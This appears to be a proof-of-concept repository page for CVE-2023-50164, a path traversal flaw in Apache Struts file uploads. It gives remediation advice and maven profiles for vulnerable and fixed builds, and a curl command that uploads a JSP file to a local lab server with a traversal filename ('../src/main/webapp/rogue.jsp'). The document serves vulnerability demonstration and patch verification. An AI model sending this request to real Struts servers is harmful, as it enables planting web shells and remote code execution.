CVE-2023-50164 PoC — Apache Struts: File upload component had a directory traversal vulnerability

Source

Associated Vulnerability

Readme

This is a Proof of Concept (PoC) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), which outlines a
new path traversal vulnerability which can lead to Remote Code Execution (RCE) in 
[struts-core](https://struts.apache.org/). 

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of
[Henrik Plate](https://github.com/henrikplate) found [here](https://github.com/henrikplate/struts-demo).

## Run the PoC

There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.

To run _with the RCE vuln_, execute the following:

```
mvn clean jetty:run -P vuln
```

To run _without the RCE vuln_, execute the following:

```
mvn clean jetty:run -P no-vuln
```

The difference between the two profiles is `vuln` uses `struts-core` version `6.3.0.1` 
(which has the path traversal vulnerability) and `no-vuln` uses `struts-core` version `6.3.0.2` 
(which does not have the path traversal vulnerability)

## Exploit the Vuln

while running the `vuln` profile described above, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll be able to see the file `rogue.jsp` in the `src/main/webapp` folder and you can browse to it at:
`http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a **Ya been PWNED!** message).

There is a code fix solution that works with the older Struts versions, _but_, it is still highly advised to update
your version of Struts.

To exercise the code fix, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll see an error message: `Attempted path traversal attack`

**NOTE**: If you use the `no-vuln` profile, you **won't** get an error message from the `/upload-no-vuln` 
endpoint, even if you use a relative path like: `../src/main/webapp/rogue.jsp`, as the new version of struts 
automatically strips away relative path references.

File Snapshot

 [4.0K]  /data/pocs/fe247bb033d6463f5a5567e1d6113b732df52e30
├── [ 11K]  LICENSE
├── [ 10K]  mvnw
├── [6.8K]  mvnw.cmd
├── [4.0K]  payload
│   └── [ 173]  rogue.jsp
├── [4.0K]  pom.xml
├── [2.1K]  README.md
├── [4.0K]  src
│   └── [4.0K]  main
│       ├── [4.0K]  java
│       │   └── [4.0K]  io
│       │       └── [4.0K]  snyk
│       │           └── [4.0K]  labs
│       │               └── [4.0K]  actions
│       │                   ├── [1.8K]  Upload.java
│       │                   └── [2.5K]  UploadNoVuln.java
│       ├── [4.0K]  resources
│       │   └── [1.2K]  struts.xml
│       └── [4.0K]  webapp
│           ├── [ 190]  index.html
│           └── [4.0K]  WEB-INF
│               ├── [ 579]  error.jsp
│               ├── [ 600]  success.jsp
│               ├── [ 570]  upload.jsp
│               └── [ 780]  web.xml
└── [4.0K]  uploads

12 directories, 14 files

Remarks